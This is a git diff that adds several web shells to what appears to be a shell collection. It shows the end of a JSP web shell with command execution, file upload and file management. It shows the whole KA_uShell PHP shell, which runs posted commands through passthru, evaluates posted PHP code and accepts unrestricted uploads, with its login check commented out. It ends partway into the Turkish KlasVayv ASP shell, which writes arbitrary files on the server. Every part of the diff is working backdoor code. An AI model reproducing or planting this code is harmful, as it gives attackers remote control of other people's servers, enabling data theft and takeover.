+			}
+			%>
+<%request.setCharacterEncoding("GBK");%>
+<%//String editfile=request.getParameter("editfile");
+//out.print(editfile);
+if (request.getParameter("jsptz")!=null)
+{%>
+<div id="Layer2" style="position:absolute; left:9px; top:340px; width:725px; height:59px; z-index:2"> 
+  <CENTER>
+  <table border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+  <tr> 
+      <td height="22" align="center" bgcolor="#000000" ><font color=#FFFFFF><strong>·şÎñÆ÷Ïà¹Ø²ÎÊı</strong></font>      
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu0'><table border=0 width=100% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+          <tr bgcolor="#999999" height="22">
+		  <td width="130" bgcolor="#999999">&nbsp;·şÎñÆ÷Ãû</td>
+            <td height="22" colspan="3">&nbsp;<%= request.getServerName() %>(<%=request.getRemoteAddr()%>)</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳ</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("os.name")%> <%=env.queryHashtable("os.version")%> 
+              <%=env.queryHashtable("sun.os.patch.level")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳÀàĞÍ</td>
+            <td>&nbsp;<%=env.queryHashtable("os.arch")%></td>
+            <td>&nbsp;·şÎñÆ÷²Ù×÷ϵͳģʽ</td>
+            <td>&nbsp;<%=env.queryHashtable("sun.arch.data.model")%>λ</td>
+          </tr>     
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷ËùÔÚµØÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.country")%></td>
+            <td>&nbsp;·şÎñÆ÷ÓïÑÔ</td>
+            <td>&nbsp;<%=env.queryHashtable("user.language")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷ʱÇø</td>
+            <td>&nbsp;<%=env.queryHashtable("user.timezone")%></td>
+            <td>&nbsp;·şÎñÆ÷ʱ¼ä</td>
+            <td>&nbsp;<%=new java.util.Date()%> </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;·şÎñÆ÷½âÒëÒıÇæ</td>
+            <td width="170">&nbsp;<%= getServletContext().getServerInfo() %></td>
+            <td width="130">&nbsp;·şÎñÆ÷¶Ë¿Ú</td>
+            <td width="170">&nbsp;<%= request.getServerPort() %></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;µ±Ç°Óû§</td>
+            <td height="22" colspan="3">&nbsp;<%=env.queryHashtable("user.name")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td>&nbsp;Óû§Ä¿Â¼</td>
+            <td colspan="3">&nbsp;<%=env.queryHashtable("user.dir")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td align=left>&nbsp;±¾ÎļşÊµ¼Ê·¾¶</td>
+            <td height="8" colspan="3">&nbsp;<%=request.getRealPath(request.getServletPath())%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+    <table width="640" border="0" cellpadding="0" cellspacing="1" class="tableBorder">
+      <tr> 
+      <td width="454" height="22" align="center" bgcolor="#000000" onclick="showsubmenu(1)"><font color=#FFFFFF><strong>JAVAÏà¹Ø²ÎÊı</strong></font> 
+      </td>
+  </tr>
+  <tr> 
+    <td style="display" id='submenu1'>
+		<table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;Ó¢ÎÄÃû³Æ</td>
+            <td width="20%" height="22">&nbsp;°æ±¾</td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËĞĞ»·¾³Ãû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.runtime.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAÔËĞĞ»·¾³ËµÃ÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.specification.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAĞéÄâ»úÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.version")%></td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;JAVAĞéÄâ»ú˵Ã÷ÊéÃû³Æ</td>
+            <td width="50%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.name")%></td>
+            <td width="20%" height="22">&nbsp;<%=env.queryHashtable("java.vm.specification.version")%></td>
+          </tr>
+		  <%
+		  	float fFreeMemory=(float)Runtime.getRuntime().freeMemory();
+			float fTotalMemory=(float)Runtime.getRuntime().totalMemory();
+			float fPercent=fFreeMemory/fTotalMemory*100;
+		  %>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAĞéÄâ»úÊ£ÓàÄڴ棺</td>
+            <td height="22" colspan="2"><img width='8' height="12" align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fFreeMemory/1024/1024%>M 
+            </td>
+          </tr>
+          <tr bordercolor="#FFFFFF" bgcolor="#999999" height="22"> 
+            <td height="22">&nbsp;JAVAĞéÄâ»ú·ÖÅäÄÚ´æ</td>
+            <td height="22" colspan="2"><img width='85%' align=absmiddle class=PicBar style="background-color: #000000">&nbsp;<%=fTotalMemory/1024/1024%>M 
+            </td>
+          </tr>
+        </table>
+		  <table border=0 width=99% cellspacing=1 cellpadding=3 bgcolor="#FFFFFF">
+            <tr bgcolor="#666666" height="22"> 
+            <td width="30%">&nbsp;²ÎÊıÃû³Æ</td>
+            <td width="70%" height="22">&nbsp;²ÎÊı·¾¶</td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.class.path </td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.class.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%>	
+            </td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.home</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.home")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.endorsed.dirs</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.endorsed.dirs")%></td>
+          </tr>
+          <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.library.path</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.library.path").replaceAll(env.queryHashtable("path.separator"),env.queryHashtable("path.separator")+"<br>&nbsp;")%> 
+            </td>
+          </tr>
+		  <tr bgcolor="#999999" height="22"> 
+            <td width="30%">&nbsp;java.io.tmpdir</td>
+            <td width="70%" height="22">&nbsp;<%=env.queryHashtable("java.io.tmpdir")%></td>
+          </tr>
+        </table>
+    </td>
+  </tr>
+</table>
+  <br>
+  <div id="testspeed" align="center"> </div>
+</CENTER></div>
+
+<%}
+else{
+if (editfile!=null)//if edit
+{
+%>
+<div id="Layer1" style="position:absolute; left:-17px; top:1029px; width:757px; height:250px; z-index:1"> 
+  <table width="99%" height="232" border="0">
+    <tr> 
+      <td height="226"><form name="form2" method="post" action="">
+          <p align="center"> µØÖ·£º
+            <input name="editfile" type="text" value="<%=editfile%>" size="50">
+          </p>
+          <p align="center"> 
+            <textarea name="content" cols="105" rows="30"><%=readAllFile(editfile)%></textarea>
+            <input type="submit" name="Submit2" value="±£´æ">
+          </p>
+        </form> </td>
+    </tr>
+  </table>
+  <p>&nbsp;</p></div>
+<%}
+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(ÍøվĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">±¾µØ´ÅÅÌ(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMDÃüÁîÖ´ĞĞ" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="ÉÏ´«" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽Õë</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        Îļş¼ĞÃû£º 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="н¨Ä¿Â¼" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        ÎļşÃû£º 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="н¨Îļş" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        Îļş<input name="scrfile" type="text" size="15"class="button">
+        ¸´ÖƵ½
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="¸´ÖÆ" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("¸´ÖƳɹ¦");%></font></td>
+  </tr>
+  <%//ÉÏ´«
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("Îļş´´½¨³É¹¦!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("Îļş´´½¨Ê§°Ü!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("ÎļşÉÏ´«³É¹¦!");
+          }
+          catch(Exception e)
+          {
+              out.print("ÎļşÉÏ´«Ê§°Ü!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ³ı</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓĞÈ¨ÏŞ");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()µÃµ½ĞéÄâ·¾¶%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">±à¼­</a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ³ı</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓĞÈ¨ÏŞ");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By ¾ø¶ÔÁã¶È[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>
\ No newline at end of file
diff --git a/138shell/K/KAdot Universal Shell v0.1.6.html.txt b/138shell/K/KAdot Universal Shell v0.1.6.html.txt
new file mode 100644
index 0000000..933de04
--- /dev/null
+++ b/138shell/K/KAdot Universal Shell v0.1.6.html.txt	
@@ -0,0 +1,229 @@
+<!--
+
+/+--------------------------------+\
+ |            KA_uShell           |
+ |    <KAdot Universal Shell>     |
+ |         Version 0.1.6          |
+ |            13.03.04            |
+ |  Author: KAdot <KAdot@ngs.ru>  |
+ |--------------------------------|
+\+                                +/
+
+-->
+<html>
+<head>
+<title>KA_uShell 0.1.6</title>
+<style type="text/css">
+<!--
+body, table{font-family:Verdana; font-size:12px;}
+table {background-color:#EAEAEA; border-width:0px;}
+b {font-family:Arial; font-size:15px;}
+a{text-decoration:none;}
+-->
+</style>
+</head>
+<body>
+
+<?php
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+$tend = "</tr></form></table><br><br><br><br>";
+
+// Configuration
+$login = "admin";
+$pass = "123";
+
+
+/*/ Authentication
+if (!isset($_SERVER['PHP_AUTH_USER'])) {
+header('WWW-Authenticate: Basic realm="KA_uShell"');
+header('HTTP/1.0 401 Unauthorized');
+exit;}
+
+else {
+if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
+{ echo "×òî íàäî?"; exit;}
+}
+*/
+
+
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "shell";}
+
+// Menu
+echo "
+|<a href=$self?ac=shell>Shell</a>|
+|<a href=$self?ac=upload>File Upload</a>|
+|<a href=$self?ac=tools>Tools</a>|
+|<a href=$self?ac=eval>PHP Eval Code</a>|
+|<a href=$self?ac=whois>Whois</a>|
+<br><br><br><pre>";
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+
+echo <<<HTML
+<b>Shell</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="shell">
+<tr><td>
+$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
+</td></tr>
+<tr><td>
+<textarea cols="100" rows="25">
+HTML;
+
+if (!empty($_POST['c'])){
+passthru($_POST['c']);
+}
+echo "</textarea></td>$tend";
+break;
+
+
+//PHP Eval Code execution
+case "eval":
+
+echo <<<HTML
+<b>PHP Eval Code</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="eval">
+<tr>
+<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
+</tr>
+<tr>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (isset($_POST['ephp'])){
+eval($_POST['ephp']);
+}
+break;
+
+
+//Text tools
+case "tools":
+
+echo <<<HTML
+<b>Tools</b>
+<table>
+<form method="POST" action="$self">
+<input type="hidden" name="ac" value="tools">
+<tr>
+<td>
+<input type="radio" name="tac" value="1">B64 Decode<br>
+<input type="radio" name="tac" value="2">B64 Encode<br><hr>
+<input type="radio" name="tac" value="3">md5 Hash
+</td>
+<td><textarea name="tot" rows="5" cols="42"></textarea></td>
+</tr>
+<tr>
+<td> </td>
+<td><input type="submit" value="Enter"></td>
+$tend
+HTML;
+
+if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
+
+switch($_POST['tac']) {
+
+case "1":
+echo "Ğàñêîäèğîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
+break;
+
+case "2":
+echo "Êîäèğîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
+break;
+
+case "3":
+echo "Êîäèğîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
+break;
+}}
+break;
+
+
+// Uploading
+case "upload":
+
+echo <<<HTML
+<b>File Upload</b>
+<table>
+<form enctype="multipart/form-data" action="$self" method="POST">
+<input type="hidden" name="ac" value="upload">
+<tr>
+<td>Ôàéëî:</td>
+<td><input size="48" name="file" type="file"></td>
+</tr>
+<tr>
+<td>Ïàïêà:</td>
+<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
+$tend
+HTML;
+
+if (isset($_POST['path'])){
+
+$uploadfile = $_POST['path'].$_FILES['file']['name'];
+if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
+
+if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
+    echo "Ôàéëî óñïåøíî çàãğóæåí â ïàïêó $uploadfile\n";
+    echo "Èìÿ:" .$_FILES['file']['name']. "\n";
+    echo "Ğàçìåğ:" .$_FILES['file']['size']. "\n";
+
+} else {
+    print "Íå óäà¸òñÿ çàãğóçèòü ôàéëî. Èíôà:\n";
+    print_r($_FILES);
+}
+}
+break;
+
+
+// Whois
+case "whois":
+echo <<<HTML
+<b>Whois</b>
+<table>
+<form action="$self" method="POST">
+<input type="hidden" name="ac" value="whois">
+<tr>
+<td>Äîìåí:</td>
+<td><input size="40" type="text" name="wq"></td>
+</tr>
+<tr>
+<td>Õóéç ñåğâåğ:</td>
+<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
+</tr>
+<tr><td>
+<input align="right" type="submit" value="Enter">
+</td></tr>
+$tend
+HTML;
+
+if (isset($_POST['wq']) && $_POST['wq']<>"") {
+
+if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
+
+$querty = $_POST['wq']."\r\n";
+$fp = fsockopen($wser, 43);
+
+if (!$fp) {echo "Íå ìîãó îòêğûòü ñîêåò";} else {
+fputs($fp, $querty);
+while(!feof($fp)){echo fgets($fp, 4000);}
+fclose($fp);
+}}
+break;
+
+
+}
+?>
+</pre>
+</body>
+</html>
\ No newline at end of file
diff --git a/138shell/K/Klasvayv.asp.txt b/138shell/K/Klasvayv.asp.txt
new file mode 100644
index 0000000..da5866b
--- /dev/null
+++ b/138shell/K/Klasvayv.asp.txt
@@ -0,0 +1,901 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Aventis KlasVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0" bgcolor="#EAEAEA">
+
+<script language="JavaScript">
+<!--
+function MM_openBrWindow(theURL,winName,features) { //v2.0
+  window.open(theURL,winName,features);
+}
+//-->
+</script>
+
+<%
+if request.querystring("usklas") = "1" then
+on error resume next
+es=request.querystring("klas")
+diez=server.urlencode(left(es,(instrRev(es,"\"))-1))
+
+Select case es
+case "C:" diez="C:"
+case "D:" diez="D:"
+end select
+
+
+
+
+%>
+
+
+
+
+
+<body topmargin="0" leftmargin="0"
+onLoad="location.href='klasvayv.asp?klas=<%=diez%>&usak=1'">
+
+<%
+else
+%>
+
+
+
+<%
+if request.querystring("dosyakaydet") <> "" then
+set kaydospos=createobject("scripting.filesystemobject")
+set	kaydoses=kaydospos.createtextfile(request.querystring("dosyakaydet") & request("dosadi"))
+set kaydoses=nothing
+set kaydospos=nothing
+set kaydospos=createobject("scripting.filesystemobject")
+set kaydoses=kaydospos.opentextfile(request.querystring("dosyakaydet") & request("dosadi"), 2, true)
+kaydoses.write request("duzenx")
+set kaydoses=nothing
+set kaydospos=nothing
+end if
+%>
+
+
+
+
+
+<%
+if request.querystring("yenidosya") <> "" then
+%>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  <tr>
+    <td width="1004" height="1" bgcolor="#9F9F9F" colspan="3">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<%=response.write(request.querystring("yenidosya"))%></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#B7B7B7">
+    <form method="POST" action="klasvayv.asp?dosyakaydet=<%=request.querystring("yenidosya")%>&klas=<%=request.querystring("yenidosya")%>" name="kaypos">
+<p align="center"><b><font size="1" face="Verdana">
+<br>
+Dosya Adı : <br>
+                </font>
+	</b><font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="97" maxlength="32"
+                name="dosadi" value="Dosya Adı"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanıcı'"
+                onfocus="if (this.value == 'Kullanıcı') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"><br>
+<br>
+                </font>
+	<b><font size="1" face="Verdana">
+İçerik :&nbsp; <br>
+                </font>
+	<font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="95" wrap="OFF"><%=sedx%></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Oluştur"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber19">
+  <tr>
+    <td width="100%" align="right" bgcolor="#000000">
+    <p align="center">
+	&nbsp;</td>
+  </tr>
+</table>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#EAEAEA">
+    <p align="right">
+	&nbsp;</td>
+  </tr>
+</table>
+
+
+
+<%
+else
+%>
+
+
+
+
+
+
+
+<%
+if request.querystring("klasorac") <> "" then
+
+set doses=createobject("scripting.filesystemobject")
+set es=doses.createfolder(request.querystring("aktifklas") & request("duzenx"))
+set es=nothing
+set doses=nothing
+
+
+end if
+%>
+
+<%
+if request.querystring("klasac") <> "" then
+
+set aktifklas=request.querystring("aktifklas")
+
+
+%>
+    <td width="65" bgcolor="#000000" height="76">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber25" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    KlasVayv 1.0</span></font></td>
